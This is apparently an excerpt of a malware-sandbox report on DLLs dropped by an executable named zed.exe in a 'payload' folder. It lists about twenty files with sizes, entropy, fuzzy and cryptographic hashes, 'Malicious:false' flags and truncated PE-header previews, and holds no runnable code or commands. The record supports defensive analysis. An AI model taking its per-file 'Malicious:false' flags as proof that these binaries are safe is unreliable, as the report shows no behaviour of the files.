                                                                                                                                                                                                                                            SHA1:B20CAC0D2F3CD803D98A2E8A25FBF65884B0B619
                                                                                                                                                                                                                                            SHA-256:5D1C2C60C4E571B88F27D4AE7D22494BED57D5EC91939E5716AFA3EA7F6871F6
                                                                                                                                                                                                                                            SHA-512:2A13AB6715B818AD62267AB51E55CD54714AEBF21EC9EA61C2AEFD56017DC84A6B360D024F8682A2E105582B9C5FE892ECEBD2BEF8A492279B19FFD84BC83FA5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...X..f.........." ................P........................................p............`.........................................0'.......'..P....P.......@...............`..(....!...............................!..8............ ...............................text............................... ..`.rdata....... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22016
                                                                                                                                                                                                                                            Entropy (8bit):6.1215844022564285
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:nUX0JfbRwUtPMbNv37t6K5jwbDEpJgLa0Mp8xCkgJrAm:jNbRw8EbxwKBwbD+gLa1nh
                                                                                                                                                                                                                                            MD5:3727271FE04ECB6D5E49E936095E95BC
                                                                                                                                                                                                                                            SHA1:46182698689A849A8C210A8BF571D5F574C6F5B1
                                                                                                                                                                                                                                            SHA-256:3AF5B35DCD5A3B6C7E88CEE53F355AAFFF40F2C21DABD4DE27DBB57D1A29B63B
                                                                                                                                                                                                                                            SHA-512:5BED1F4DF678FE90B8E3F1B7C4F68198463E579209B079CB4A40DCAC01CE26AA2417DBE029B196F6F2C6AFAD560E2D1AF9F089ABE37EAD121CA10EE69D9659ED
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...W..f.........." .....(...0......P.....................................................`.........................................0Y.......Y..d............p..................0....Q...............................R..8............@...............................text...H'.......(.................. ..`.rdata.......@... ...,..............@..@.data...H....`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..0............T..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):17920
                                                                                                                                                                                                                                            Entropy (8bit):5.293810509074883
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:4PHoDUntQjNB+/yw/pogeXOvXoTezczOo3p9iJgDQ3iNgnVbwhA:dUOhBcDRogeXOfoTezcio3pUJgDQ3i+
                                                                                                                                                                                                                                            MD5:78AEF441C9152A17DD4DC40C7CC9DF69
                                                                                                                                                                                                                                            SHA1:6BB6F8426AFA6522E647DFC82B1B64FAF3A9781F
                                                                                                                                                                                                                                            SHA-256:56E4E4B156295F1AAA22ECB5481841DE2A9EB84845A16E12A7C18C7C3B05B707
                                                                                                                                                                                                                                            SHA-512:27B27E77BE81B29D42359FE28531225383860BCD19A79044090C4EA58D9F98009A254BF63585979C60B3134D47B8233941ABB354A291F23C8641A4961FA33107
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...Y..f.........." .....(... ......P.....................................................`.........................................pI......lJ..d....p.......`..................(....A...............................A..8............@...............................text....'.......(.................. ..`.rdata.......@.......,..............@..@.data........P.......<..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc..(............D..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11776
                                                                                                                                                                                                                                            Entropy (8bit):4.862619033406922
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:0Ga+F/1NtJ9t4udqaj01rlALnNNJSS2sP+YEdMN+F9FdKaWDULk+VOmWbucX6gR7:PF/1n7Guqaj0ktfEON+bMDUlJcqg0Gd
                                                                                                                                                                                                                                            MD5:19E0ABF76B274C12FF624A16713F4999
                                                                                                                                                                                                                                            SHA1:A4B370F556B925F7126BF87F70263D1705C3A0DB
                                                                                                                                                                                                                                            SHA-256:D9FDA05AE16C5387AB46DC728C6EDCE6A3D0A9E1ABDD7ACB8B32FC2A17BE6F13
                                                                                                                                                                                                                                            SHA-512:D03033EA5CF37641FBD802EBEB5019CAEF33C9A78E01519FEA88F87E773DCA92C80B74BA80429B530694DAD0BFA3F043A7104234C7C961E18D48019D90277C8E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...Y..f.........." ................P.....................................................`..........................................8.......8..d....`.......P..X............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......$..............@....pdata..X....P.......&..............@..@.rsrc........`.......*..............@..@.reloc..(....p.......,..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):14336
                                                                                                                                                                                                                                            Entropy (8bit):5.227045547076371
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:saF/1n7Guqaj0ktrE8o2o+V2rQnjt1wmg9jtveDn4clG6VcqgOvgdd:swGXkFE8Zo+AojO9jZeDf5rgOvgz
                                                                                                                                                                                                                                            MD5:309D6F6B0DD022EBD9214F445CAC7BB9
                                                                                                                                                                                                                                            SHA1:ABD22690B7AD77782CFC0D2393D0C038E16070B0
                                                                                                                                                                                                                                            SHA-256:4FBE188C20FB578D4B66349D50AA6FFE4AB86844FB6427C57738F36780D1E2E2
                                                                                                                                                                                                                                            SHA-512:D1951FE92F83E7774E8E877815BED6E6216D56EF18B7F1C369D678CB6E1814243659E9FA7ABC0D22FB5B34A9D50A51D5A89BA00AE1FDD32157FD0FF9902FB4B7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...U..f.........." ................P.....................................................`..........................................8.......9..d....`.......P..@............p..(....2...............................2..8............0...............................text...x........................... ..`.rdata.......0....... ..............@..@.data...H....@......................@....pdata..@....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..(....p.......6..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):13824
                                                                                                                                                                                                                                            Entropy (8bit):5.176369829782773
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:rF/1n7Guqaj0ktrESsrUW+SBjsK5tcQmEreD2mf1AoxkVcqgOvgXQ:rGXkFE/UW575tA2eDp1Ao2rgOvgX
                                                                                                                                                                                                                                            MD5:D54FEB9A270B212B0CCB1937C660678A
                                                                                                                                                                                                                                            SHA1:224259E5B684C7AC8D79464E51503D302390C5C9
                                                                                                                                                                                                                                            SHA-256:032B83F1003A796465255D9B246050A196488BAC1260F628913E536314AFDED4
                                                                                                                                                                                                                                            SHA-512:29955A6569CA6D039B35BB40C56AEEB75FC765600525D0B469F72C97945970A428951BAB4AF9CD21B3161D5BBA932F853778E2674CA83B14F7ABA009FA53566F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...U..f.........." ................P.....................................................`..........................................8.......9..d....`.......P..@............p..(....2...............................2..8............0...............................text...h........................... ..`.rdata.......0......................@..@.data...H....@.......,..............@....pdata..@....P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):14336
                                                                                                                                                                                                                                            Entropy (8bit):5.047563322651927
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:6alCvH32p3/2pnEhKnLg9yH8puzoFaPERIQAvHD9CIg5kP:5CvHmp3OpnEhmLg9yH8puzoFaPERIQgI
                                                                                                                                                                                                                                            MD5:52DCD4151A9177CF685BE4DF48EA9606
                                                                                                                                                                                                                                            SHA1:F444A4A5CBAE9422B408420115F0D3FF973C9705
                                                                                                                                                                                                                                            SHA-256:D54375DC0652358A6E4E744F1A0EAEEAD87ACCD391A20D6FF324FE14E988A122
                                                                                                                                                                                                                                            SHA-512:64C54B89F2637759309ECC6655831C3A6755924ED70CBC51614061542EB9BA9A8AECF6951EB3AB92447247DC4D7D846C88F4957DBBE4484A9AB934343EE27178
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...Q..f.........." ......... ......P.....................................................`.........................................@9.......9..d....`.......P..(............p..(....2...............................2..8............0...............................text...X........................... ..`.rdata..@....0......................@..@.data...x....@......................@....pdata..(....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..(....p.......6..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):13824
                                                                                                                                                                                                                                            Entropy (8bit):5.09893680790018
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:xsiXeqVb0lwbH4P01sAD7I/9hAkwDWzBEbcqgqLg:valqH4M1sAD7KvpwDFtgqLg
                                                                                                                                                                                                                                            MD5:F929B1A3997427191E07CF52AC883054
                                                                                                                                                                                                                                            SHA1:C5EA5B68586C2FB09E5FDD20D4DD616D06F5CBA6
                                                                                                                                                                                                                                            SHA-256:5386908173074FABD95BF269A9DF0A4E1B21C0576923186F449ABF4A820F6A8E
                                                                                                                                                                                                                                            SHA-512:2C79DBCE2C21214D979AB86DD989D41A3AFA7FCB7F3B79BA9974E2EE8F832DD7CA20C1C87C0C380DB037D776FE6D0851D60AD55A08AFDE0003B7E59214DD2F3B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...R..f.........." ................P.....................................................`.........................................08.......8..d....`.......P..(............p..(....1...............................2..8............0...............................text............................... ..`.rdata..0....0......................@..@.data........@.......,..............@....pdata..(....P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):15360
                                                                                                                                                                                                                                            Entropy (8bit):5.451865349855574
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:KfwogDHER1wuiDSyoGTgDZOviNgEPrLg:ugDHELwuiDScTgDwi+EP
                                                                                                                                                                                                                                            MD5:1FA5E257A85D16E916E9C22984412871
                                                                                                                                                                                                                                            SHA1:1AC8EE98AD0A715A1B40AD25D2E8007CDC19871F
                                                                                                                                                                                                                                            SHA-256:D87A9B7CAD4C451D916B399B19298DC46AAACC085833C0793092641C00334B8E
                                                                                                                                                                                                                                            SHA-512:E4205355B647C6E28B7E4722328F51DC2EB3A109E9D9B90F7C53D7A80A5A4B10E40ABDDAB1BA151E73EF3EB56941F843535663F42DCE264830E6E17BB659EADF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...R..f.........." ..... ..........P.....................................................`..........................................8......`9..d....`.......P..X............p..(....1...............................1..8............0...............................text............ .................. ..`.rdata.......0.......$..............@..@.data........@.......2..............@....pdata..X....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..(....p.......:..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):13824
                                                                                                                                                                                                                                            Entropy (8bit):5.104245335186531
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:3F/1n7Guqaj0kt7/Ev9kt0Qwac6QzD8iD0QocqgI4G0S:nGXkd/EvGt9wacNDvAgI4v
                                                                                                                                                                                                                                            MD5:FAD578A026F280C1AE6F787B1FA30129
                                                                                                                                                                                                                                            SHA1:9A3E93818A104314E172A304C3D117B6A66BEB55
                                                                                                                                                                                                                                            SHA-256:74A1FF0801F4704158684267CD8E123F83FB6334FE522C1890AC4A0926F80AB1
                                                                                                                                                                                                                                            SHA-512:ACF8F5B382F3B4C07386505BBDCAF625D13BCC10AA93ED641833E3548261B0AD1063E2F59BE2FCD2AFAF3D315CB3FC5EB629CEFC168B33CFD65A3A6F1120F7FF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...U..f.........." ......... ......P.....................................................`..........................................9.......:..d....`.......P...............p..(...@3..............................`3..8............0...............................text...H........................... ..`.rdata.......0......................@..@.data...H....@.......,..............@....pdata.......P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):17920
                                                                                                                                                                                                                                            Entropy (8bit):5.671305741258107
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:APHoDUntQj0sKhDOJ+0QPSfu6rofDjiZzgE+kbwb:VUOYsKNO466DjoUE+
                                                                                                                                                                                                                                            MD5:556E6D0E5F8E4DA74C2780481105D543
                                                                                                                                                                                                                                            SHA1:7A49CDEF738E9FE9CD6CD62B0F74EAD1A1774A33
                                                                                                                                                                                                                                            SHA-256:247B0885CF83375211861F37B6DD1376AED5131D621EE0137A60FE7910E40F8B
                                                                                                                                                                                                                                            SHA-512:28FA0CE6BDBCC5E95B80AADC284C12658EF0C2BE63421AF5627776A55050EE0EA0345E30A15B744FC2B2F5B1B1BBB61E4881F27F6E3E863EBAAEED1073F4CDA1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...R..f.........." .....*..........P.....................................................`..........................................H......hI..d....p.......`..X...............(....A...............................A..8............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data........P.......<..............@....pdata..X....`.......>..............@..@.rsrc........p.......B..............@..@.reloc..(............D..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):21504
                                                                                                                                                                                                                                            Entropy (8bit):5.878701941774916
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:EJWo4IRCGHX1KXqHGcvYHp5RYcARQOj4MSTjqgPmJD1OhgkxEv:EcIRnHX1P/YtswvaD1Rk
                                                                                                                                                                                                                                            MD5:2F2655A7BBFE08D43013EDDA27E77904
                                                                                                                                                                                                                                            SHA1:33D51B6C423E094BE3E34E5621E175329A0C0914
                                                                                                                                                                                                                                            SHA-256:C734ABBD95EC120CB315C43021C0E1EB1BF2295AF9F1C24587334C3FCE4A5BE1
                                                                                                                                                                                                                                            SHA-512:8AF99ACC969B0E560022F75A0CDCAA85D0BDEADADEACD59DD0C4500F94A5843EA0D4107789C1A613181B1F4E5252134A485EF6B1D9D83CDB5676C5FEE4D49B90
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...S..f.........." .....6... ......P.....................................................`.........................................@Z......([..d............p..................(....R...............................R..8............P...............................text....5.......6.................. ..`.rdata..x....P.......:..............@..@.data........`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..(............R..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):21504
                                                                                                                                                                                                                                            Entropy (8bit):5.881781476285865
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:EJWo4IRCGHXfKXqHGcvYHp5RYcARQOj4MSTjqgPmJD12gkxEv:EcIRnHXfP/YtswvaD1zk
                                                                                                                                                                                                                                            MD5:CDE035B8AB3D046B1CE37EEE7EE91FA0
                                                                                                                                                                                                                                            SHA1:4298B62ED67C8D4F731D1B33E68D7DC9A58487FF
                                                                                                                                                                                                                                            SHA-256:16BEA322D994A553B293A724B57293D57DA62BC7EAF41F287956B306C13FD972
                                                                                                                                                                                                                                            SHA-512:C44FDEE5A210459CE4557351E56B2D357FD4937F8EC8EACEAB842FEE29761F66C2262FCBAAC837F39C859C67FA0E23D13E0F60B3AE59BE29EB9D8ABAB0A572BB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...S..f.........." .....6... ......P.....................................................`.........................................@Z......([..d............p..................(....R...............................R..8............P...............................text....5.......6.................. ..`.rdata..x....P.......:..............@..@.data........`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..(............R..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):26624
                                                                                                                                                                                                                                            Entropy (8bit):5.837887867708438
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:e839Cc4itui0gel9soFdkO66MlPGXmXcyYDTzks:Ns4u/FZ6nPxMLDvk
                                                                                                                                                                                                                                            MD5:999D431197D7E06A30E0810F1F910B9A
                                                                                                                                                                                                                                            SHA1:9BFF781221BCFFD8E55485A08627EC2A37363C96
                                                                                                                                                                                                                                            SHA-256:AB242B9C9FB662C6F7CB57F7648F33983D6FA3BB0683C5D4329EC2CC51E8C875
                                                                                                                                                                                                                                            SHA-512:A5DD92DD471ADB44EEFE5919EF9CA3978724E21174DF5B3A9C1F0AB462F928E5A46A460D02417DB7522F5DE3BFEED5EEE6B1EAFAF3E621722E85E72675F7096F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...T..f.........." .....H..."......P.....................................................`..........................................k.......l..d...............................(...pd...............................d..8............`...............................text....F.......H.................. ..`.rdata.......`.......L..............@..@.data................^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..(............f..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):26624
                                                                                                                                                                                                                                            Entropy (8bit):5.895310340516013
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:lcX9Nf4ttui0gel9soFdkO66MlPGXmXc/vDTOvk:a38u/FZ6nPxM3DAk
                                                                                                                                                                                                                                            MD5:0931ABBF3AED459B1A2138B551B1D3BB
                                                                                                                                                                                                                                            SHA1:9EC0296DDAF574A89766A2EC035FC30073863AB0
                                                                                                                                                                                                                                            SHA-256:1729A0DC6B80CB7A3C07372B98B10D3C6C613EA645240878E1FDE6A992FA06F1
                                                                                                                                                                                                                                            SHA-512:9F970BB4D10B94F525DDDDE307C7DA5E672BBFB3A3866A34B89B56ADA99476724FD690A4396857182749294F67F36DB471A048789FB715D2A7DAF46917FC1947
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...T..f.........." .....H..."......P.....................................................`.........................................@l......(m..d...............................(....d...............................e..8............`...............................text...hG.......H.................. ..`.rdata..x....`.......L..............@..@.data................^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..(............f..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):12800
                                                                                                                                                                                                                                            Entropy (8bit):4.967737129255606
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:dMpWt/1nCuqaL0kt7TsEx2fiTgDZqGF0T7cqgkLgJ:k/k1Ts64DDJyBgkLg
                                                                                                                                                                                                                                            MD5:5F057A380BACBA4EF59C0611549C0E02
                                                                                                                                                                                                                                            SHA1:4B758D18372D71F0AA38075F073722A55B897F71
                                                                                                                                                                                                                                            SHA-256:BCB14DAC6C87C24269D3E60C46B49EFFB1360F714C353318F5BBAA48C79EC290
                                                                                                                                                                                                                                            SHA-512:E1C99E224745B86EE55822C1DBCB4555A11EC31B72D87B46514917EB61E0258A1C6D38C4F592969C17EB4F0F74DA04BCECA31CF1622720E95F0F20E9631792E8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d...V..f.........." ................P.....................................................`.........................................P8.......8..d....`.......P...............p..(....1...............................1..8............0...............................text............................... ..`.rdata..2....0......................@..@.data...H....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..(....p.......0..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):13312
                                                                                                                                                                                                                                            Entropy (8bit):5.007867576025166
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:bMt/1nCuqaL0ktPH0T7fwtF4zDn2rGacqgRGd:1/kpU3Yv4zDXqgRGd
                                                                                                                                                                                                                                            MD5:49BCA1B7DF076D1A550EE1B7ED3BD997
                                                                                                                                                                                                                                            SHA1:47609C7102F5B1BCA16C6BAD4AE22CE0B8AEE9E9
                                                                                                                                                                                                                                            SHA-256:49E15461DCB76690139E71E9359F7FCF92269DCCA78E3BFE9ACB90C6271080B2
                                                                                                                                                                                                                                            SHA-512:8574D7FA133B72A4A8D1D7D9FDB61053BC88C2D238B7AC7D519BE19972B658C44EA1DE433885E3206927C75DD5D1028F74999E048AB73189585B87630F865466
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...V..f.........." ................P.....................................................`..........................................8.......8..d....`.......P..X............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......*..............@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..(....p.......2..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):15872
                                                                                                                                                                                                                                            Entropy (8bit):5.226023387740053
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:rfRKTN+HLjRskTdf4WazSTkwjEvuY2bylHDiYIgovg:mcHfRl5pauoSjy5DiE
                                                                                                                                                                                                                                            MD5:CB5CFDD4241060E99118DEEC6C931CCC
                                                                                                                                                                                                                                            SHA1:1E7FED96CF26C9F4730A4621CA9D18CECE3E0BCE
                                                                                                                                                                                                                                            SHA-256:A8F809B6A417AF99B75EEEEA3ECD16BDA153CBDA4FFAB6E35CE1E8C884D899C4
                                                                                                                                                                                                                                            SHA-512:8A89E3563C14B81353D251F9F019D8CBF07CB98F78452B8522413C7478A0D77B9ABF2134E4438145D6363CDA39721D2BAE8AD13D1CDACCBB5026619D95F931CF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...U..f.........." ..... ... ......P.....................................................`..........................................9.......9..d....`.......P..X............p..(...p2...............................2..8............0...............................text............ .................. ..`.rdata..@....0.......$..............@..@.data........@.......4..............@....pdata..X....P.......6..............@..@.rsrc........`.......:..............@..@.reloc..(....p.......<..............@..B........................................................................................................................................................................................................................................
